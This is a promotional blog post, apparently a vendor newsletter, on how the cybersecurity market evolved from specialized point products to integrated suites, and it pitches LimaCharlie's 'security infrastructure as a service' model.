Evolution of cybersecurity and Security Infrastructure as a Service
Musings about the past, present & the future of cybersecurity, why the current approach won’t scale, and what we can do next
Welcome to Venture in Security! Before we begin, do me a favor and make sure you hit the “Subscribe” button. Subscriptions let me know that you care and keep me motivated to write more. Thanks folks!
Evolution of cybersecurity
As I mentioned in the previous article, there were 1,862 data breaches in 2021, surpassing both 2020’s total of 1,108 and the previous all-time record of 1,506 set in 2017.
Security entrepreneurs are taking a note and new startups emerge daily. Here is a ”simple” example of what has become a common way to group companies in a logical way — a so-called cybersecurity technology map:
This is a lot to take in, yet the above chart is one of the simplest illustrations available when searching “cybersecurity technology map”.
A reasonable question could be — how did we get here?
It’s a difficult question to answer as there are many variables that have led us here. The simplest answer might sound like this: “Every market goes through different stages of evolution. What we are seeing today in security is a natural evolutionary path, marked by milestones that appear inevitable, in hindsight”.
Vendor Specialization
Security is a complex space with many attack vectors, and few people who truly understand the fundamentals. This complexity has led companies to specialize and build monolithic products which address a single, narrow use case in depth.
Specialization, from a basic perspective, does make logical sense: the more you do thing A, the better you become at doing thing A. For companies, specialization makes it easier to achieve economies of scale, and to carve out a lucrative niche. For customers, it is easier to evaluate vendors who operate within narrowly defined verticals.
Things start to break down as an industry gets more complex. Two verticals become four, four become eight, and after a few years you are sitting in front of a chart with thousands of logos within hundreds of boxes. This is arguably how we got AV, EDR, XDR, NDR, SIEM, SOAR, XSOAR and many other market categories.
At some point, specialization becomes a liability. Without having a broad and holistic understanding of industry fundamentals, vendors start building products that do one thing fairly well, but can’t easily integrate into a larger picture. Customers struggle to evaluate different vendors as there are simply too many product groups involved. Confused and overwhelmed, they start defaulting to heuristics and so-called “expert recommendations” which fuels the industry of market analysts and consultants.
Vendor Integration
Inevitably, users will reach a point of overwhelm, where making sense of the myriad market options available becomes a tiresome chore. Adding to this frustration is the need to buy hundreds of tools and hope to stitch them all together, due to specialized products offering viable solutions to a limited subset of problems. This is arduous for many reasons:
more vendors means more spending
more spending & more contract negotiation results in more overhead for finance, supply chain and security teams
more tools creates the need to connect them into one experience
This last one is especially tricky as each widget has a highly specialized use case, and on its own it was never designed to talk to other widgets.
At this stage, two things happen:
a new market category appears providing a class of products connecting thousands of widgets which were never intended to connect with each other; what was born out of desperation becomes a SOAR/XSOAR vertical
large companies realize that there is a need for all-in-one solutions, so they do what is easy and what they are best equipped to do: buy small vendors and integrate them into their legacy platforms
Short-term, this might appear to be a positive shift, a “win” for the whole industry. It cannot, however, be a sustainable long-term approach. An average Fortune 500 company today manages 100+ cybersecurity vendors and this number is growing.
If this is the stage we are at today, where do we go from here? What next step makes the most sense?
Security Infrastructure as a Service
In LimaCharlie, we argue that cybersecurity today is undergoing a similar evolution that IT recently experienced. It is the evolution that has led to monolithic enterprise technology being replaced by the infrastructure-as-a-service approach, like that offered by Amazon AWS.
When AWS came into the picture, most companies came to realize that an assembly of tools from large vendors is unnecessary. Rather, an ecosystem of solutions encompassing the ability to self-serve, scale up/scale down, and achieve efficiency by leveraging API-first products built for scale, is much more logical.
Today, LimaCharlie is leading the market transformation and the definition of security infrastructure as a service. LimaCharlie enables organizations to detect & respond to threats, automate processes, reduce the number of vendors, and future-proof their security operations.
The approach LimaCharlie takes is innovative and sound, from both a technical and a business perspective.
From the technical perspective, LimaCharlie focuses on solving security problems regardless of what industry vertical has traditionally been expected to solve them. Most importantly, it is done in a way that scales. Below are some examples of how Security Infrastructure as a Service compares to the traditional, vertical market segments. By no means an exhaustive list of features LimaCharlie offers, rather a flavour of what security infrastructure looks like:
As security engineers, we know that security is a process, not a feature. The best way to build a security posture is to build it on top of controls and infrastructure that can be observed, tested and enhanced. It is not built on promises from vendors that must be taken at face value.
This means that the exact set of malicious activity and behavior you’re protected from should be known and you should be able to test/prove this. It also means that if you can describe something you want to detect and prevent, you should be able to apply it unilaterally without vendor intervention.
The only way to get there is to approach security the same way you approach building other IT systems. Thankfully, security has a proven track record to look up to: IT and DevOps.
Not all parts of the security stack are equal. Some layers are fundamentally similar across environments, or are sophisticated but can be abstracted to serve all use cases. It is these layers of the stack that LimaCharlie lives in. The layers where your value as a security engineer is inefficient. You need those layers, but any work you have to do to provision and maintain them is wasted time, money, and effort. We do all this for you, so you can focus on the higher level layers, where you shine.
From the business perspective, we attempt to democratize access to security and make it easier, more transparent, and more cost-effective. Some highlights include:
What this means for the future is that organizations can gain access to infinitely scalable capabilities they need when, and for however long they need them, with no capacity planning or contracts to sign.
Why LimaCharlie exists
LimaCharlie was built by security professionals as an answer to four fundamental, yet unmet needs.
Need for Transparency
Historically, the security industry has not been transparent to consumers or security professionals.
“How do I know what I am covered against?” is the most basic question a security professional has when choosing a vendor. And yet, most EDR, AV, and SIEM and other vendors offer “magic box” solutions that lack transparency and promise to “keep you safe against everything”. However disingenuous and misleading this assurance might be to those who know that security is complex, it is a common variation of the marketing statement that most security companies circulate.
The lack of transparency does not end there. “How much will I be paying?” is another question that should be simple to answer and yet it is not. With most vendors, going through a series of meetings and sales demos before learning what pricing to expect, and in some instances before you can take a look at the product, is not unusual.
LimaCharlie stands on the principle of full transparency and we believe this is what the security market of the future needs to look like.
Need for Control
Getting familiar with each craft starts by following prescriptive directions. “Do X and you will get Y”. This simplicity benefits beginners as it allows them to internalize simple axioms before they learn the fundamentals that define rules of the game. Security is no different. “When a red light is flashing on the dashboard, gather your team as you are under attack” is a simple direction both to give and to follow.
That is until you stop being a beginner. As your expertise broadens, you learn that to ensure a holistic security posture, you need to understand your company’s operation and have a deep familiarity with your environment. Once you reach this level, a red flashing alert is no longer enough — you want to be able to control how you do security.
“How can I control my own destiny and decide how we do security at my organization?”
“How do I choose what services to use and what capabilities to pay for?”
These and many other questions cannot be answered by the vertically focused vendors as their products lack flexibility and the ability to choose what you use and how you use it. There is a need for another approach — one that allows full control over the neutral infrastructure, does not dictate how you do things, or force you in any direction.
Need for Scale
It is not enough to simply customize a product to fit a security team’s workflow. Monitoring a single company is one thing, monitoring N companies at scale is entirely different. It’s like changing the tire on your car, vs opening a garage where you see 200 cars a week: it’s easy to find a solution when the demand is minimal, but making that solution work when managing hundreds of tenants requires broader capabilities and quite a bit more finesse.
The question a security professional eventually starts asking is “How can I scale our way of doing security across thousands of endpoints and possibly hundreds of tenants?”
This question cannot be answered by vendors that built monoliths and connected them together. Yes, there are large companies on the market which acquire hundreds of startups a year and attempt to position themselves as an “all-in-one solution”. However, taking fifty widgets that are not integrated from day one, banding them together, and expecting a scalable infrastructure platform like Google Cloud or AWS is impractical and unlikely.
To address the need for scale, it’s imperative to be building for scale from day one — to think about latency and integration when you plan every single feature. That’s what we do at LimaCharlie.We take the API-first approach and promote infrastructure as code, which enables us to offer the same experience when serving thousands of tenants as we do when serving one.
Need for Innovation
We know that security needs innovation. As cybercriminals are getting more and more advanced, it is imperative that those on the defence side keep innovating as well. We believe that there are three components needed for innovation to happen: people, funding and infrastructure.
People
In the past decade, we have seen a huge shift around cybersecurity education. Universities, colleges, bootcamps, and online education providers are stepping up to fill the talent gap in security. Students, professionals and industry leaders are organizing meetups, CTFs and hands-on competitions to grow their skills and to prepare the next generation of security talent.
Funding
A larger shift has been happening around funding as well. There are a number of venture capital firms, startup incubators and angel investors solely focused on security. Governments have been offering grants and non-dilutive funding as well. Most importantly, both private and institutional investors started including cybersecurity companies to their portfolios.
Infrastructure
The last critical ingredient required for innovation is cost-effective access to infrastructure. The emergence of cloud computing has enabled small teams to access the computing power that was previously only available to large enterprises. This, in turn, has led to the rise of machine learning, artificial intelligence and other emerging technologies.
Cybersecurity as an industry has been very slow to catch up with the shift that happened in IT.
“How can I get started in seconds without having to meet any minimums or talk to a team of salespeople just to access the product?”
Today, this is a question that is very hard to answer. EDR and SIEM vendors require a minimum number of endpoints and a multi-year contract before you can get started. For a startup founder or a small innovative DFIR/MSSP firm, this requirement can hinder growth and even kill the idea.
LimaCharlie is democratizing access to security infrastructure by allowing users to get started with powerful tools and infrastructure for free, without having to do the capacity planning or put in their credit card. We believe that making security infrastructure more accessible will lead to innovation in the industry and, ultimately, benefit all of us.
What’s next?
Discussions of any new technology, as well as predictions about the future of the whole industry, tend to age very badly, as this article about Google Glass from 9 years ago shows.
As Peter Drucker said,
The only thing we know about the future is that it will be different.
While we can’t confidently say what the future will look like, we can see that:
Security is becoming more and more complex, and “point and click” antivirus/EDR solutions can no longer offer the same peace of mind as they did 5–10 years ago
The number of attack vectors is growing every year, and every new medium (VR, AR, metaverse, social media, etc.) is introducing more and more complexity
The amount of data is growing and as the world becomes more connected, the number of breaches is going up as well
The number of security vendors focused on small use cases is growing, and integrating tens (or hundreds) of tools into one solution is still a big challenge
Very few products on the market are built as API-first, developer-centered solutions
This list can go on and on for quite some time. It is unreasonable to argue that any new approach is going to solve all problems. Our thesis at LimaCharlie is that security infrastructure as a service will equip security professionals with powerful tools so that they can focus on what they can do best. The future of security, at least for the next decade, is human.